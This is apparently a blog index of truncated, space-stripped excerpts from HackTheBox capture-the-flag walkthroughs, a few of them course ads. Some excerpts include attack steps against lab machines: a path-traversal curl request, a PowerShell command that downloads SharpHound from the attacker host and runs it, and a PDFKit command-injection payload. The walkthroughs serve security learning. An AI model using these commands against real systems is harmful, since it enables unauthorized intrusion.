- 2024-09-09HACKTHEBOX——Brainfuck
靶机详情靶机地址:10.10.10.17攻击地址:10.10.16.3端口服务扫描首先依旧要确定攻击主机能否Ping通靶机使用nmap或者其他工具扫描目标开放了哪些端口与服务渗透过程从上图可以看到目标开放了135、139、445端口,开放了Smb服务,这个服务有个大名鼎鼎的漏洞就是永恒之
- 2024-09-08HACKTHEBOX——Lame
靶机详情靶机地址:10.10.10.3攻击地址:10.10.14.10端口服务扫描先确认kali是否与靶机互通接下来使用nmap或者其他工具扫描一下靶机开放了哪些端口以及服务渗透过程根据htb中的flag提示完成前两个任务第三个任务提示VSFTPd2.3.4存在一个著名的后门,尝试使用ms
- 2024-07-02Hackthebox bagel.dll 代码审计
利用ilspy将bagel.dll打开关于此目录有可以说的内容目录解析最上方的bagel是组装名字(assemblename)bagel_server是命令空间(namespace)下一级分支是类如File,Base,Handler,Orders等(class)反序列化导致的命令执行漏洞代码审计思路 首先看主程序Bagel1.通过明显的英语翻
- 2024-06-08HackTheBox(黑客盒子)基础模块速通Responder篇
前言 还是速通,直接给大家上解题思路。这台靶机侧重使用responder工具通过黑化kali获取hash。靶机提供准备目标靶机网络连通题目已披露的漏洞环境实战攻击任务一unika.htb任务二直接上nmap扫服务,试试看能否爆出来。nmap-sV-T410.129.253.226可以看
- 2024-04-08hackthebox Entity
hacktheboxPwnEntity每日一更 Pwn系列Entity题目下载文件解压以后是带着源文件的那就先看代码#include<stdio.h>#include<stdlib.h>#include<string.h>staticunion{unsignedlonglonginteger;charstring[8];}DataStore;typedefenum{
- 2024-03-24hackthebox carrier medium
ReconNMAPSCANnamp-sT-p---min-rate1000-oAnmap/ports10.10.10.10522/tcpopenssh80/tcpopenhttpnmap-sT-pxx,xx-sV-oAnmap/version10.10.10.105nmap-sU-p---min-rate1000-oAnmap/udp10.10.10.105port161/udpopensnmpnmap-sU-pxx-sV-oA
- 2024-03-11hackthebox sandworm medium writeup
Thisisthewriteupforthemediummachine'onlyrforyou'.Topiccoveredinthisarticleare: LFI,commnadinjection,neo4jcipherinjection,maliciouspythonpackagesandcodeexecutionviapipdownload.ShellasuserSubdomainenumeration:ffuf
- 2024-02-17HackTheBox - Codify [easy]
打这台靶机时及其古怪。总是莫名其妙断开连接,请求没有响应。提交时表示flag错误等问题访问80端口的web服务,发现使用nodjs和vm2库。搜索到vm2漏洞:SandboxBypassinvm2|CVE-2023-32314|Snyk 可远程执行代码查看当前用户,可登录使用ssh登录,使用linpeas.sh等工具枚举,发
- 2024-02-16HackTheBox - Drive
#nmap--top-ports=100010.10.11.235StartingNmap7.94SVN(https://nmap.org)at2024-02-1511:10CSTNmapscanreportfordrive.htb(10.10.11.235)Hostisup(0.12slatency).Notshown:997closedtcpports(reset)PORTSTATESERVICE22/tcpop
- 2024-01-15hackthebox outdated windows medium
CONNECTbetweenwindowsandlinuxBloodhoundCollectionGrabthelatestcopyofSharpHound.exefromtheBloodhoundrepo,uploadittoOutdated,workingoutofC:\programdataiwrhttp://10.10.14.5:8888/SharpHound.exe-outfiles.exe.\s.exe-Call2022-0
- 2023-12-27hackthebox absolute insane
信息收集Payattentiontothelastlinessl-date:wehave7hourclockskew,whichshouldkeepinmindifdoinganykeberosauth.SMB-TCP445smbclient-N-L//10.10.11.181#对面拒绝连接crackmapexecsmbabsolute.htb #对面存在smbcrackmapexec
- 2023-12-14hackthebox broscience medium
Brieflyinstruction:Thistime,thetargetmachineencoutersomeurlcoding,phpcodeauditfounddeserialization,scriptwritingaccordingtothecontent,pgsqlinjection,hashcatblastingwithsaltvalueandpspyfoundautomaticallyrunscripts.Afterauditin
- 2023-12-12hackthebox bagel medium
Flaskexploit /proc/self/cmdlineunderstandswhichprocessiscurrentlyrunningtoprovicethewebservice.curlhttp://10.10.11.201:8000/?page=../../../../../../proc/self/cmdline-o-Abouttheflask:Afterweknowwhichpyfileiscurrentlyrunningt
- 2023-12-06hackthebox jupyter medium
BREIFLY.thisboxisquitehardforbeginner.thewalkthroughisfollowing:1.nmapscanopenportsdetailanddiscoverthisboxopen22and80portbutonlygivethedomain http://jupiter.htb FUZZTESTING:atthetimewecanFUZZthesubdomainofthisdom
- 2023-12-01hackthebox broker easy
briefintruducton1.Thefirstbreakthrouthisweekpasswordofadminathttp://10.10.11.243/website.ifwecouldutilizeadmin/adminsuccessfullyaccessthehttp://10.10.11.243/admin/asthewebsitetitle,thisisthemiddlewarenamedactivemqwithversi
- 2023-11-28hackthebox format medium walkthrough
walkthough 1.Wemustbrowsethewebsiteandlookupthebusinesspointforthewebpage.atthisboxwecanfindthecoderepository.codeauditinganddiscoveringtheprivilegeescalatedthroughtheRedisUnixsockvulnerability.2.Afterprivilegeescalat
- 2023-10-31vulntarget漏洞靶场系列(三)
本次推荐的模拟环境如下:https://www.hackthebox.com/ 扫描客服微信 获取课件完整PDF
- 2023-10-31vulntarget漏洞靶场系列(二)
本次推荐的模拟环境如下:https://www.hackthebox.com/ 扫描客服微信 获取课件完整PDF
- 2023-10-31BurpSuite靶场系列之逻辑漏洞
本次推荐的模拟环境如下:https://www.hackthebox.com/ 扫描客服微信 获取课件完整PDF
- 2023-10-17hackthebox agile medium
信息收集portscanningsudonmap--sT--min-rate10000-p-10.10.11.203-oAnmap/agilesudonmap-sT-sC-sV-pxx10.10.11.203-oAnmap/detialbannertellsusit'sanubuntuserverwealsoaddthatdomainto/etc/hostsfile->10.10.11.203superp
- 2023-10-02hackthebox streamIO
信息收集端口扫描nmap-sT--min-rate10000-p-10.129.64.95-oAnmap/ports由于端口比较多所以需要对端口进行详细服务的扫描字符操作grepnamp/ports|awk-F'/''{print$1}'|paste-sd','获得nmap需要的端口数据当端口比较多的时候可以将该段数据echo到某个
- 2023-09-19HackTheBox系列之Unicode
本次推荐的模拟环境如下:https://www.hackthebox.com/ 本次环境主要涉及Nginx目录遍历、JKU伪造、JWT令牌伪造、命令注入、SUDO提权,目标拿下flag。 扫描客服微信 获取完整PDF
- 2023-07-24hackthebox pollution insane
startofnamp it'sbannbertellsusit'sapachealsorunningdebianandmoreimportatntlywegetaphpsessioncookieidbacksochancesarethisisgoingtobeaphpwebsitelet'sgotakealookatthepage rolltothedeepandwefind
- 2023-07-11Hackthebox Lame
HacktheboxLameNMAPScanning──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]└─$sudonmap-sS-sV-sC-p-10.129.145.147-oNnmap_full_scan[sudo]passwordforkali:StartingNmap7.94(https://nmap.org)at2023-07-1110:06EDTNmapscanreportforlocalh
- 2023-06-30hackthebox precious easy
常规进行信息收集以及开放端口访问80进行探测主页有一个html2pdf的功能探测一下正常业务看看是否存命令执行等正常业务下载好文件后,利用exiftools查看该pdf的信息发现发现powerbypdfkitv8.6.0存在CVE-2022-25765PDFKit.new("http://example.com/?name=#{'%20`sleep5`'